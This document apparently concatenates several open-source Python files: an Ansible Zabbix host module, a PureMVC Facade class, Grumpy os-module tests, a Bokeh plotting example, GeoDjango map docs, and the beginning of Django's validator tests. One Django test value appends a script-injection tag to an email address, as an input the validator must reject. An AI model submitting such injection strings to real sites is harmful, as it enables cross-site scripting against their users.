from zabbix_api import ZabbixAPI, ZabbixAPISubClass
HAS_ZABBIX_API = True
except ImportError:
HAS_ZABBIX_API = False
# Extend the ZabbixAPI class.
# The zabbix-api python module is too old (version 1.0, with no newer
# release so far) to support the 'hostinterface' API calls,
# so we have to subclass ZabbixAPI to add 'hostinterface' support.
class ZabbixAPIExtends(ZabbixAPI):
hostinterface = None
def __init__(self, server, timeout, **kwargs):
ZabbixAPI.__init__(self, server, timeout=timeout)
self.hostinterface = ZabbixAPISubClass(self, dict({"prefix": "hostinterface"}, **kwargs))
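# Usage sketch (illustrative URL and credentials):
#     zbx = ZabbixAPIExtends('http://monitor.example.com', timeout=10)
#     zbx.login('username', 'password')
#     zbx.hostinterface.get({'output': 'extend', 'hostids': '10105'})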
class Host(object):
def __init__(self, module, zbx):
self._module = module
self._zapi = zbx
    # check whether a host already exists
def is_host_exist(self, host_name):
result = self._zapi.host.exists({'host': host_name})
return result
# check if host group exists
def check_host_group_exist(self, group_names):
for group_name in group_names:
result = self._zapi.hostgroup.exists({'name': group_name})
if not result:
self._module.fail_json(msg="Hostgroup not found: %s" % group_name)
return True
def get_template_ids(self, template_list):
template_ids = []
if template_list is None or len(template_list) == 0:
return template_ids
for template in template_list:
template_list = self._zapi.template.get({'output': 'extend', 'filter': {'host': template}})
if len(template_list) < 1:
self._module.fail_json(msg="Template not found: %s" % template)
else:
template_id = template_list[0]['templateid']
template_ids.append(template_id)
return template_ids
def add_host(self, host_name, group_ids, status, interfaces, proxy_id):
try:
if self._module.check_mode:
self._module.exit_json(changed=True)
parameters = {'host': host_name, 'interfaces': interfaces, 'groups': group_ids, 'status': status}
if proxy_id:
parameters['proxy_hostid'] = proxy_id
host_list = self._zapi.host.create(parameters)
if len(host_list) >= 1:
return host_list['hostids'][0]
except Exception, e:
self._module.fail_json(msg="Failed to create host %s: %s" % (host_name, e))
def update_host(self, host_name, group_ids, status, host_id, interfaces, exist_interface_list, proxy_id):
try:
if self._module.check_mode:
self._module.exit_json(changed=True)
parameters = {'hostid': host_id, 'groups': group_ids, 'status': status}
if proxy_id:
parameters['proxy_hostid'] = proxy_id
self._zapi.host.update(parameters)
interface_list_copy = exist_interface_list
if interfaces:
for interface in interfaces:
flag = False
interface_str = interface
for exist_interface in exist_interface_list:
interface_type = interface['type']
exist_interface_type = int(exist_interface['type'])
if interface_type == exist_interface_type:
# update
interface_str['interfaceid'] = exist_interface['interfaceid']
self._zapi.hostinterface.update(interface_str)
flag = True
interface_list_copy.remove(exist_interface)
break
if not flag:
# add
interface_str['hostid'] = host_id
self._zapi.hostinterface.create(interface_str)
# remove
remove_interface_ids = []
for remove_interface in interface_list_copy:
interface_id = remove_interface['interfaceid']
remove_interface_ids.append(interface_id)
if len(remove_interface_ids) > 0:
self._zapi.hostinterface.delete(remove_interface_ids)
except Exception, e:
self._module.fail_json(msg="Failed to update host %s: %s" % (host_name, e))
def delete_host(self, host_id, host_name):
try:
if self._module.check_mode:
self._module.exit_json(changed=True)
self._zapi.host.delete({'hostid': host_id})
except Exception, e:
self._module.fail_json(msg="Failed to delete host %s: %s" % (host_name, e))
# get host by host name
def get_host_by_host_name(self, host_name):
host_list = self._zapi.host.get({'output': 'extend', 'filter': {'host': [host_name]}})
if len(host_list) < 1:
self._module.fail_json(msg="Host not found: %s" % host_name)
else:
return host_list[0]
# get proxyid by proxy name
def get_proxyid_by_proxy_name(self, proxy_name):
proxy_list = self._zapi.proxy.get({'output': 'extend', 'filter': {'host': [proxy_name]}})
if len(proxy_list) < 1:
self._module.fail_json(msg="Proxy not found: %s" % proxy_name)
else:
return proxy_list[0]['proxyid']
# get group ids by group names
def get_group_ids_by_group_names(self, group_names):
group_ids = []
if self.check_host_group_exist(group_names):
group_list = self._zapi.hostgroup.get({'output': 'extend', 'filter': {'name': group_names}})
for group in group_list:
group_id = group['groupid']
group_ids.append({'groupid': group_id})
return group_ids
# get host templates by host id
def get_host_templates_by_host_id(self, host_id):
template_ids = []
template_list = self._zapi.template.get({'output': 'extend', 'hostids': host_id})
for template in template_list:
template_ids.append(template['templateid'])
return template_ids
# get host groups by host id
def get_host_groups_by_host_id(self, host_id):
exist_host_groups = []
host_groups_list = self._zapi.hostgroup.get({'output': 'extend', 'hostids': host_id})
if len(host_groups_list) >= 1:
for host_groups_name in host_groups_list:
exist_host_groups.append(host_groups_name['name'])
return exist_host_groups
    # check whether the existing interfaces match the requested interfaces
def check_interface_properties(self, exist_interface_list, interfaces):
interfaces_port_list = []
if len(interfaces) >= 1:
for interface in interfaces:
interfaces_port_list.append(int(interface['port']))
exist_interface_ports = []
if len(exist_interface_list) >= 1:
for exist_interface in exist_interface_list:
exist_interface_ports.append(int(exist_interface['port']))
if set(interfaces_port_list) != set(exist_interface_ports):
return True
for exist_interface in exist_interface_list:
            exist_interface_port = int(exist_interface['port'])
for interface in interfaces:
interface_port = int(interface['port'])
                if interface_port == exist_interface_port:
for key in interface.keys():
if str(exist_interface[key]) != str(interface[key]):
return True
return False
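    # For example, if the host currently exposes only port 10050 but the task
    # requests ports 10050 and 161, the port sets differ, the method returns
    # True, and update_host() reconciles the interfaces.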
    # get the status from a host object
def get_host_status_by_host(self, host):
return host['status']
# check all the properties before link or clear template
def check_all_properties(self, host_id, host_groups, status, interfaces, template_ids,
exist_interfaces, host, proxy_id):
# get the existing host's groups
exist_host_groups = self.get_host_groups_by_host_id(host_id)
if set(host_groups) != set(exist_host_groups):
return True
# get the existing status
exist_status = self.get_host_status_by_host(host)
if int(status) != int(exist_status):
return True
        # check whether the existing interfaces match the requested interfaces
if self.check_interface_properties(exist_interfaces, interfaces):
return True
# get the existing templates
exist_template_ids = self.get_host_templates_by_host_id(host_id)
if set(list(template_ids)) != set(exist_template_ids):
return True
if host['proxy_hostid'] != proxy_id:
return True
return False
# link or clear template of the host
def link_or_clear_template(self, host_id, template_id_list):
# get host's exist template ids
exist_template_id_list = self.get_host_templates_by_host_id(host_id)
exist_template_ids = set(exist_template_id_list)
template_ids = set(template_id_list)
template_id_list = list(template_ids)
# get unlink and clear templates
templates_clear = exist_template_ids.difference(template_ids)
templates_clear_list = list(templates_clear)
request_str = {'hostid': host_id, 'templates': template_id_list, 'templates_clear': templates_clear_list}
try:
if self._module.check_mode:
self._module.exit_json(changed=True)
self._zapi.host.update(request_str)
        except Exception as e:
self._module.fail_json(msg="Failed to link template to host: %s" % e)
def main():
module = AnsibleModule(
argument_spec=dict(
server_url=dict(type='str', required=True, aliases=['url']),
            login_user=dict(type='str', required=True),
login_password=dict(type='str', required=True, no_log=True),
host_name=dict(type='str', required=True),
host_groups=dict(type='list', required=False),
link_templates=dict(type='list', required=False),
status=dict(default="enabled", choices=['enabled', 'disabled']),
state=dict(default="present", choices=['present', 'absent']),
timeout=dict(type='int', default=10),
interfaces=dict(type='list', required=False),
force=dict(type='bool', default=True),
proxy=dict(type='str', required=False)
),
supports_check_mode=True
)
if not HAS_ZABBIX_API:
        module.fail_json(msg="Missing required zabbix-api module (check docs or install with: pip install zabbix-api)")
server_url = module.params['server_url']
login_user = module.params['login_user']
login_password = module.params['login_password']
host_name = module.params['host_name']
host_groups = module.params['host_groups']
link_templates = module.params['link_templates']
status = module.params['status']
state = module.params['state']
timeout = module.params['timeout']
interfaces = module.params['interfaces']
force = module.params['force']
proxy = module.params['proxy']
# convert enabled to 0; disabled to 1
status = 1 if status == "disabled" else 0
zbx = None
# login to zabbix
try:
zbx = ZabbixAPIExtends(server_url, timeout=timeout)
zbx.login(login_user, login_password)
    except Exception as e:
module.fail_json(msg="Failed to connect to Zabbix server: %s" % e)
host = Host(module, zbx)
template_ids = []
if link_templates:
template_ids = host.get_template_ids(link_templates)
group_ids = []
if host_groups:
group_ids = host.get_group_ids_by_group_names(host_groups)
ip = ""
if interfaces:
for interface in interfaces:
if interface['type'] == 1:
ip = interface['ip']
    # check if host exists
is_host_exist = host.is_host_exist(host_name)
if is_host_exist:
# Use proxy specified, or set to None when updating host
if proxy:
proxy_id = host.get_proxyid_by_proxy_name(proxy)
else:
proxy_id = None
# get host id by host name
zabbix_host_obj = host.get_host_by_host_name(host_name)
host_id = zabbix_host_obj['hostid']
if state == "absent":
# remove host
host.delete_host(host_id, host_name)
            module.exit_json(changed=True, result="Successfully deleted host %s" % host_name)
else:
if not group_ids:
module.fail_json(msg="Specify at least one group for updating host '%s'." % host_name)
if not force:
            module.fail_json(changed=False, result="Host present; can't update configuration without force")
# get exist host's interfaces
exist_interfaces = host._zapi.hostinterface.get({'output': 'extend', 'hostids': host_id})
exist_interfaces_copy = copy.deepcopy(exist_interfaces)
# update host
interfaces_len = len(interfaces) if interfaces else 0
if len(exist_interfaces) > interfaces_len:
if host.check_all_properties(host_id, host_groups, status, interfaces, template_ids,
exist_interfaces, zabbix_host_obj, proxy_id):
host.link_or_clear_template(host_id, template_ids)
host.update_host(host_name, group_ids, status, host_id,
interfaces, exist_interfaces, proxy_id)
module.exit_json(changed=True,
                                 result="Successfully updated host %s (%s) and linked with template '%s'"
% (host_name, ip, link_templates))
else:
module.exit_json(changed=False)
else:
if host.check_all_properties(host_id, host_groups, status, interfaces, template_ids,
exist_interfaces_copy, zabbix_host_obj, proxy_id):
host.update_host(host_name, group_ids, status, host_id, interfaces, exist_interfaces, proxy_id)
host.link_or_clear_template(host_id, template_ids)
module.exit_json(changed=True,
                                 result="Successfully updated host %s (%s) and linked with template '%s'"
% (host_name, ip, link_templates))
else:
module.exit_json(changed=False)
else:
# Use proxy specified, or set to 0 when adding new host
if proxy:
proxy_id = host.get_proxyid_by_proxy_name(proxy)
else:
proxy_id = 0
if not group_ids:
module.fail_json(msg="Specify at least one group for creating host '%s'." % host_name)
        if not interfaces:
module.fail_json(msg="Specify at least one interface for creating host '%s'." % host_name)
# create host
host_id = host.add_host(host_name, group_ids, status, interfaces, proxy_id)
host.link_or_clear_template(host_id, template_ids)
module.exit_json(changed=True, result="Successfully added host %s (%s) and linked with template '%s'" % (
host_name, ip, link_templates))
from ansible.module_utils.basic import *
main()
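# Hedged usage sketch: a minimal playbook task for this module. The host name,
# group, credentials, and interface values below are illustrative placeholders,
# not values taken from the source.
#
#   - name: Ensure a Zabbix host exists
#     zabbix_host:
#       server_url: http://zabbix.example.com
#       login_user: Admin
#       login_password: secret
#       host_name: web01.example.com
#       host_groups:
#         - Linux servers
#       status: enabled
#       state: present
#       interfaces:
#         - type: 1
#           main: 1
#           useip: 1
#           ip: 10.0.0.5
#           dns: ""
#           port: 10050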
| gpl-3.0 |
PureMVC/puremvc-python-demo-gae-blog | src/puremvc/patterns/facade.py | 1 | 9327 | """
PureMVC Python Port by Toby de Havilland <toby.de.havilland@puremvc.org>
PureMVC - Copyright(c) 2006-08 Futurescale, Inc., Some rights reserved.
Your reuse is governed by the Creative Commons Attribution 3.0 License
"""
import puremvc.core
import puremvc.interfaces
import puremvc.patterns.observer
class Facade(object, puremvc.interfaces.IFacade):
"""
A base Singleton C{IFacade} implementation.
In PureMVC, the C{Facade} class assumes these
responsibilities:
Initializing the C{Model}, C{View} and C{Controller} Singletons.
Providing all the methods defined by the C{IModel, IView, & IController} interfaces.
Providing the ability to override the specific C{Model}, C{View} and C{Controller} Singletons created.
Providing a single point of contact to the application for registering C{Commands} and notifying C{Observers}
@see: L{Model<org.puremvc.as3.core.model.Model>}
@see: L{View<org.puremvc.as3.core.view.View>}
@see: L{Controller<org.puremvc.as3.core.controller.Controller>}
@see: L{Notification<org.puremvc.as3.patterns.observer.Notification>}
@see: L{Mediator<org.puremvc.as3.patterns.mediator.Mediator>}
@see: L{Proxy<org.puremvc.as3.patterns.proxy.Proxy>}
@see: L{SimpleCommand<org.puremvc.as3.patterns.command.SimpleCommand>}
@see: L{MacroCommand<org.puremvc.as3.patterns.command.MacroCommand>}
"""
instance = None
controller = None
model = None
view = None
def __new__(cls, *args, **kwargs):
"""
This C{IFacade} implementation is a Singleton, so you should not call the constructor
directly, but instead call the static Singleton method C{Facade.getInstance()}
"""
if not cls.instance or not isinstance(cls.instance, cls):
cls.instance = super(Facade, cls).__new__(cls, *args, **kwargs)
cls.instance.initializeFacade()
return cls.instance
@staticmethod
def getInstance():
"""
C{Facade} Singleton Static method.
@return: the Singleton instance of C{Facade}
"""
return Facade()
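    # A minimal usage sketch (hypothetical subclass and notification name);
    # concrete applications usually subclass Facade and register their
    # commands during initialization:
    #
    #   class ApplicationFacade(Facade):
    #       def initializeController(self):
    #           Facade.initializeController(self)
    #           self.registerCommand('STARTUP', StartupCommand)
    #
    #   facade = ApplicationFacade()          # singleton enforced via __new__
    #   facade.sendNotification('STARTUP')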
def initializeFacade(self):
"""
Initialize the Singleton C{Facade} instance.
Called automatically by the constructor. Override in your
subclass to do any subclass specific initializations. Be
sure to call C{Facade.initializeFacade()}, though.
"""
self.initializeController()
self.initializeModel()
self.initializeView()
def initializeController(self):
"""
Initialize the C{Controller}.
Called by the C{initializeFacade} method.
Override this method in your subclass of C{Facade}
if one or both of the following are true:
You wish to initialize a different C{IController}.
You have C{Commands} to register with the C{Controller} at startup.
If you don't want to initialize a different C{IController},
        call C{super.initializeController()} at the beginning of your method, then register C{Command}s.
Note: This method is I{rarely} overridden; in practice you are more
likely to use a C{Command} to create and register C{Proxy}s
with the C{Model}, since C{Proxy}s with mutable data will likely
need to send C{INotification}s and thus will likely want to fetch a reference to
the C{Facade} during their construction.
"""
if (self.controller is not None):
return
self.controller = puremvc.core.Controller.getInstance()
def initializeModel(self):
"""
Initialize the C{Model}.
Called by the C{initializeFacade} method.
Override this method in your subclass of C{Facade}
if one or both of the following are true:
You wish to initialize a different C{IModel}.
You have C{Proxy}s to register with the Model that do not
retrieve a reference to the Facade at construction time.
If you don't want to initialize a different C{IModel},
call C{super.initializeModel()} at the beginning of your
method, then register C{Proxy}s.
Note: This method is I{rarely} overridden; in practice you are more
likely to use a C{Command} to create and register C{Proxy}s
with the C{Model}, since C{Proxy}s with mutable data will likely
need to send C{INotification}s and thus will likely want to fetch a reference to
the C{Facade} during their construction.
"""
if (self.model is not None):
return
self.model = puremvc.core.Model.getInstance()
def initializeView(self):
"""
Initialize the C{View}.
Called by the C{initializeFacade} method.
Override this method in your subclass of C{Facade}
if one or both of the following are true:
You wish to initialize a different C{IView}.
You have C{Observers} to register with the C{View}
If you don't want to initialize a different C{IView},
call C{super.initializeView()} at the beginning of your
method, then register C{IMediator} instances.
Note: This method is I{rarely} overridden; in practice you are more
likely to use a C{Command} to create and register C{Mediator}s
with the C{View}, since C{IMediator} instances will need to send
C{INotification}s and thus will likely want to fetch a reference
to the C{Facade} during their construction.
"""
if (self.view is not None):
return
self.view = puremvc.core.View.getInstance()
def registerCommand(self, notificationName, commandClassRef):
"""
Register an C{ICommand} with the C{Controller} by Notification name.
@param notificationName: the name of the C{INotification} to associate the C{ICommand} with
@param commandClassRef: a reference to the Class of the C{ICommand}
"""
self.controller.registerCommand(notificationName, commandClassRef)
def removeCommand(self, notificationName):
"""
Remove a previously registered C{ICommand} to C{INotification} mapping from the Controller.
@param notificationName: the name of the C{INotification} to remove the C{ICommand} mapping for
"""
self.controller.removeCommand(notificationName)
def hasCommand(self, notificationName):
"""
Check if a Command is registered for a given Notification
@param notificationName: the name of the C{INotification}
@return: whether a Command is currently registered for the given C{notificationName}.
"""
return self.controller.hasCommand(notificationName)
def registerProxy(self, proxy):
"""
Register an C{IProxy} with the C{Model} by name.
@param proxy: the C{IProxy} instance to be registered with the C{Model}.
"""
self.model.registerProxy(proxy)
def retrieveProxy(self, proxyName):
"""
Retrieve an C{IProxy} from the C{Model} by name.
@param proxyName: the name of the proxy to be retrieved.
@return: the C{IProxy} instance previously registered with the given C{proxyName}.
"""
return self.model.retrieveProxy(proxyName)
def removeProxy(self, proxyName):
"""
Remove an C{IProxy} from the C{Model} by name.
@param proxyName: the C{IProxy} to remove from the C{Model}.
@return: the C{IProxy} that was removed from the C{Model}
"""
proxy = None
if (self.model is not None):
proxy = self.model.removeProxy(proxyName)
return proxy
def hasProxy(self, proxyName):
"""
Check if a Proxy is registered
@param proxyName: the name of the C{IProxy}
@return: whether a Proxy is currently registered with the given C{proxyName}.
"""
return self.model.hasProxy(proxyName)
def registerMediator(self, mediator):
"""
Register a C{IMediator} with the C{View}.
@param mediator: a reference to the C{IMediator}
"""
if (self.view is not None):
self.view.registerMediator(mediator)
def retrieveMediator(self, mediatorName):
"""
Retrieve an C{IMediator} from the C{View}.
@param mediatorName: the name of the C{IMediator}
@return: the C{IMediator} previously registered with the given C{mediatorName}.
"""
return self.view.retrieveMediator(mediatorName)
def removeMediator(self, mediatorName):
"""
Remove an C{IMediator} from the C{View}.
@param mediatorName: name of the C{IMediator} to be removed.
@return: the C{IMediator} that was removed from the C{View}
"""
mediator = None
if (self.view is not None):
mediator = self.view.removeMediator(mediatorName)
return mediator
def hasMediator(self, mediatorName):
"""
Check if a Mediator is registered or not
@param mediatorName: the name of the C{IMediator}
@return: whether a Mediator is registered with the given C{mediatorName}.
"""
return self.view.hasMediator(mediatorName)
def sendNotification(self, notificationName, body=None, type=None):
"""
Create and send an C{INotification}.
Keeps us from having to construct new notification
instances in our implementation code.
        @param notificationName: the name of the notification to send
@param body: the body of the notification (optional)
@param type: the type of the notification (optional)
"""
self.notifyObservers(puremvc.patterns.observer.Notification(notificationName, body, type))
def notifyObservers(self, notification):
"""
Notify C{Observer}s.
This method is left public mostly for backward
compatibility, and to allow you to send custom
notification classes using the facade.
Usually you should just call sendNotification
and pass the parameters, never having to
construct the notification yourself.
@param notification: the C{INotification} to have the C{View} notify C{Observers} of.
"""
if (self.view is not None):
self.view.notifyObservers(notification) | bsd-3-clause |
pombredanne/grumpy | grumpy-runtime-src/lib/os_test.py | 5 | 4620 | # Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import stat
import time
import tempfile
import weetest
def TestChdirAndGetCwd():
path = os.getcwd()
os.chdir('.')
assert os.getcwd() == path
tempdir = tempfile.mkdtemp()
try:
os.chdir(tempdir)
assert tempdir in os.getcwd()
finally:
os.chdir(path)
os.rmdir(tempdir)
assert os.getcwd() == path
def TestChmod():
fd, path = tempfile.mkstemp()
os.close(fd)
os.chmod(path, 0o644)
mode = os.stat(path).st_mode & 0o777
os.remove(path)
assert mode == 0o644
def TestChmodOSError():
tempdir = tempfile.mkdtemp()
try:
os.chmod(tempdir + '/DoesNotExist', 0o644)
except OSError:
pass
else:
raise AssertionError
def TestClose():
fd, _ = tempfile.mkstemp()
os.close(fd)
try:
os.fdopen(fd)
except OSError:
pass
else:
raise AssertionError
def TestCloseOSError():
fd, _ = tempfile.mkstemp()
os.close(fd)
try:
os.close(fd)
except OSError:
pass
else:
raise AssertionError
def TestEnviron():
assert 'HOME' in os.environ
def TestFDOpen():
fd, path = tempfile.mkstemp()
f = os.fdopen(fd, 'w')
f.write('foobar')
f.close()
f = open(path)
contents = f.read()
f.close()
assert contents == 'foobar', contents
def TestFDOpenOSError():
fd, _ = tempfile.mkstemp()
os.close(fd)
try:
os.fdopen(fd)
except OSError:
pass
else:
raise AssertionError
def TestMkdir():
path = 'foobarqux'
try:
os.stat(path)
except OSError:
pass
else:
raise AssertionError
try:
os.mkdir(path)
assert stat.S_ISDIR(os.stat(path).st_mode)
except OSError:
raise AssertionError
finally:
os.rmdir(path)
def TestPopenRead():
f = os.popen('qux')
assert f.close() == 32512
f = os.popen('echo hello')
try:
assert f.read() == 'hello\n'
finally:
assert f.close() == 0
def TestPopenWrite():
# TODO: We should verify the output but there's no good way to swap out stdout
# at the moment.
f = os.popen('cat', 'w')
f.write('popen write\n')
f.close()
def TestRemove():
fd, path = tempfile.mkstemp()
os.close(fd)
os.stat(path)
os.remove(path)
try:
os.stat(path)
except OSError:
pass
else:
raise AssertionError
def TestRemoveNoExist():
path = tempfile.mkdtemp()
try:
os.remove(path + '/nonexistent')
except OSError:
pass
else:
raise AssertionError
finally:
os.rmdir(path)
def TestRemoveDir():
path = tempfile.mkdtemp()
try:
os.remove(path)
except OSError:
pass
else:
raise AssertionError
finally:
os.rmdir(path)
def TestRmDir():
path = tempfile.mkdtemp()
assert stat.S_ISDIR(os.stat(path).st_mode)
os.rmdir(path)
try:
os.stat(path)
except OSError:
pass
else:
raise AssertionError
def TestRmDirNoExist():
path = tempfile.mkdtemp()
try:
os.rmdir(path + '/nonexistent')
except OSError:
pass
else:
raise AssertionError
finally:
os.rmdir(path)
def TestRmDirFile():
fd, path = tempfile.mkstemp()
os.close(fd)
try:
os.rmdir(path)
except OSError:
pass
else:
raise AssertionError
finally:
os.remove(path)
def TestStatFile():
t = time.time()
fd, path = tempfile.mkstemp()
os.close(fd)
st = os.stat(path)
os.remove(path)
assert not stat.S_ISDIR(st.st_mode)
assert stat.S_IMODE(st.st_mode) == 0o600
# System time and mtime may have different precision so give 10 sec leeway.
assert st.st_mtime + 10 > t
assert st.st_size == 0
def TestStatDir():
path = tempfile.mkdtemp()
mode = os.stat(path).st_mode
os.rmdir(path)
assert stat.S_ISDIR(mode)
assert stat.S_IMODE(mode) == 0o700
def TestStatNoExist():
path = tempfile.mkdtemp()
try:
os.stat(path + '/nonexistent')
except OSError:
pass
else:
raise AssertionError
finally:
os.rmdir(path)
def TestWaitPid():
try:
pid, status = os.waitpid(-1, os.WNOHANG)
except OSError as e:
assert 'no child processes' in str(e).lower()
if __name__ == '__main__':
weetest.RunTests()
| apache-2.0 |
stonebig/bokeh | examples/plotting/file/elements.py | 5 | 1855 | import pandas as pd
from bokeh.models import ColumnDataSource, LabelSet
from bokeh.plotting import figure, show, output_file
from bokeh.sampledata.periodic_table import elements
elements = elements.copy()
elements = elements[elements["atomic number"] <= 82]
elements = elements[~pd.isnull(elements["melting point"])]
mass = [float(x.strip("[]")) for x in elements["atomic mass"]]
elements["atomic mass"] = mass
palette = ["#053061", "#2166ac", "#4393c3", "#92c5de", "#d1e5f0",
"#f7f7f7", "#fddbc7", "#f4a582", "#d6604d", "#b2182b", "#67001f"]
melting_points = elements["melting point"]
low = min(melting_points)
high = max(melting_points)
melting_point_inds = [int(10*(x-low)/(high-low)) for x in melting_points]  # map each melting point to a palette index 0-10
elements['melting_colors'] = [palette[i] for i in melting_point_inds]
TITLE = "Density vs Atomic Weight of Elements (colored by melting point)"
TOOLS = "hover,pan,wheel_zoom,box_zoom,reset,save"
p = figure(tools=TOOLS, toolbar_location="above", plot_width=1200, title=TITLE)
p.toolbar.logo = "grey"
p.background_fill_color = "#dddddd"
p.xaxis.axis_label = "atomic weight (amu)"
p.yaxis.axis_label = "density (g/cm^3)"
p.grid.grid_line_color = "white"
p.hover.tooltips = [
("name", "@name"),
("symbol:", "@symbol"),
("density", "@density"),
("atomic weight", "@{atomic mass}"),
("melting point", "@{melting point}")
]
source = ColumnDataSource(elements)
p.circle("atomic mass", "density", size=12, source=source,
color='melting_colors', line_color="black", fill_alpha=0.8)
labels = LabelSet(x="atomic mass", y="density", text="symbol", y_offset=8,
text_font_size="8pt", text_color="#555555",
source=source, text_align='center')
p.add_layout(labels)
output_file("elements.html", title="elements.py example")
show(p)
| bsd-3-clause |
lisael/pg-django | django/contrib/gis/maps/google/__init__.py | 603 | 2648 | """
This module houses the GoogleMap object, used for generating
the needed javascript to embed Google Maps in a Web page.
Google(R) is a registered trademark of Google, Inc. of Mountain View, California.
Example:
* In the view:
return render_to_response('template.html', {'google' : GoogleMap(key="abcdefg")})
* In the template:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
{{ google.xhtml }}
<head>
<title>Google Maps via GeoDjango</title>
{{ google.style }}
{{ google.scripts }}
</head>
{{ google.body }}
<div id="{{ google.dom_id }}" style="width:600px;height:400px;"></div>
</body>
</html>
Note: If you want to be more explicit in your templates, the following are
equivalent:
{{ google.body }} => "<body {{ google.onload }} {{ google.onunload }}>"
{{ google.xhtml }} => "<html xmlns="http://www.w3.org/1999/xhtml" {{ google.xmlns }}>"
{{ google.style }} => "<style>{{ google.vml_css }}</style>"
Explanation:
- The `xhtml` property provides the correct XML namespace needed for
Google Maps to operate in IE using XHTML. Google Maps on IE uses
VML to draw polylines. Returns, by default:
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml">
- The `style` property provides the correct style tag for the CSS
properties required by Google Maps on IE:
<style type="text/css">v\:* {behavior:url(#default#VML);}</style>
- The `scripts` property provides the necessary <script> tags for
including the Google Maps javascript, as well as including the
generated javascript.
- The `body` property provides the correct attributes for the
body tag to load the generated javascript. By default, returns:
<body onload="gmap_load()" onunload="GUnload()">
- The `dom_id` property returns the DOM id for the map. Defaults to "map".
The following attributes may be set or customized in your local settings:
* GOOGLE_MAPS_API_KEY: String of your Google Maps API key. These are tied to
to a domain. May be obtained from http://www.google.com/apis/maps/
* GOOGLE_MAPS_API_VERSION (optional): Defaults to using "2.x"
* GOOGLE_MAPS_URL (optional): Must have a substitution ('%s') for the API
version.
"""
from django.contrib.gis.maps.google.gmap import GoogleMap, GoogleMapSet
from django.contrib.gis.maps.google.overlays import GEvent, GIcon, GMarker, GPolygon, GPolyline
from django.contrib.gis.maps.google.zoom import GoogleZoom
| bsd-3-clause |
wyc/django | tests/validators/tests.py | 163 | 16552 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import io
import os
import re
import types
from datetime import datetime, timedelta
from unittest import TestCase
from django.core.exceptions import ValidationError
from django.core.validators import (
BaseValidator, EmailValidator, MaxLengthValidator, MaxValueValidator,
MinLengthValidator, MinValueValidator, RegexValidator, URLValidator,
int_list_validator, validate_comma_separated_integer_list, validate_email,
validate_integer, validate_ipv4_address, validate_ipv6_address,
validate_ipv46_address, validate_slug, validate_unicode_slug,
)
from django.test import SimpleTestCase
from django.test.utils import str_prefix
from django.utils._os import upath
NOW = datetime.now()
EXTENDED_SCHEMES = ['http', 'https', 'ftp', 'ftps', 'git', 'file']
TEST_DATA = [
# (validator, value, expected),
(validate_integer, '42', None),
(validate_integer, '-42', None),
(validate_integer, -42, None),
(validate_integer, -42.5, ValidationError),
(validate_integer, None, ValidationError),
(validate_integer, 'a', ValidationError),
(validate_integer, '\n42', ValidationError),
(validate_integer, '42\n', ValidationError),
(validate_email, 'email@here.com', None),
(validate_email, 'weirder-email@here.and.there.com', None),
(validate_email, 'email@[127.0.0.1]', None),
(validate_email, 'email@[2001:dB8::1]', None),
(validate_email, 'email@[2001:dB8:0:0:0:0:0:1]', None),
(validate_email, 'email@[::fffF:127.0.0.1]', None),
(validate_email, 'example@valid-----hyphens.com', None),
(validate_email, 'example@valid-with-hyphens.com', None),
(validate_email, 'test@domain.with.idn.tld.उदाहरण.परीक्षा', None),
(validate_email, 'email@localhost', None),
(EmailValidator(whitelist=['localdomain']), 'email@localdomain', None),
(validate_email, '"test@test"@example.com', None),
(validate_email, 'example@atm.%s' % ('a' * 63), None),
(validate_email, 'example@%s.atm' % ('a' * 63), None),
(validate_email, 'example@%s.%s.atm' % ('a' * 63, 'b' * 10), None),
(validate_email, 'example@atm.%s' % ('a' * 64), ValidationError),
(validate_email, 'example@%s.atm.%s' % ('b' * 64, 'a' * 63), ValidationError),
(validate_email, None, ValidationError),
(validate_email, '', ValidationError),
(validate_email, 'abc', ValidationError),
(validate_email, 'abc@', ValidationError),
(validate_email, 'abc@bar', ValidationError),
(validate_email, 'a @x.cz', ValidationError),
(validate_email, 'abc@.com', ValidationError),
(validate_email, 'something@@somewhere.com', ValidationError),
(validate_email, 'email@127.0.0.1', ValidationError),
(validate_email, 'email@[127.0.0.256]', ValidationError),
(validate_email, 'email@[2001:db8::12345]', ValidationError),
(validate_email, 'email@[2001:db8:0:0:0:0:1]', ValidationError),
(validate_email, 'email@[::ffff:127.0.0.256]', ValidationError),
(validate_email, 'example@invalid-.com', ValidationError),
(validate_email, 'example@-invalid.com', ValidationError),
(validate_email, 'example@invalid.com-', ValidationError),
(validate_email, 'example@inv-.alid-.com', ValidationError),
(validate_email, 'example@inv-.-alid.com', ValidationError),
(validate_email, 'test@example.com\n\n<script src="x.js">', ValidationError),
# Quoted-string format (CR not allowed)
(validate_email, '"\\\011"@here.com', None),
(validate_email, '"\\\012"@here.com', ValidationError),
(validate_email, 'trailingdot@shouldfail.com.', ValidationError),
# Max length of domain name labels is 63 characters per RFC 1034.
(validate_email, 'a@%s.us' % ('a' * 63), None),
(validate_email, 'a@%s.us' % ('a' * 64), ValidationError),
# Trailing newlines in username or domain not allowed
(validate_email, 'a@b.com\n', ValidationError),
(validate_email, 'a\n@b.com', ValidationError),
(validate_email, '"test@test"\n@example.com', ValidationError),
(validate_email, 'a@[127.0.0.1]\n', ValidationError),
(validate_slug, 'slug-ok', None),
(validate_slug, 'longer-slug-still-ok', None),
(validate_slug, '--------', None),
(validate_slug, 'nohyphensoranything', None),
(validate_slug, 'a', None),
(validate_slug, '1', None),
(validate_slug, 'a1', None),
(validate_slug, '', ValidationError),
(validate_slug, ' text ', ValidationError),
(validate_slug, ' ', ValidationError),
(validate_slug, 'some@mail.com', ValidationError),
(validate_slug, '你好', ValidationError),
(validate_slug, '你 好', ValidationError),
(validate_slug, '\n', ValidationError),
(validate_slug, 'trailing-newline\n', ValidationError),
(validate_unicode_slug, 'slug-ok', None),
(validate_unicode_slug, 'longer-slug-still-ok', None),
(validate_unicode_slug, '--------', None),
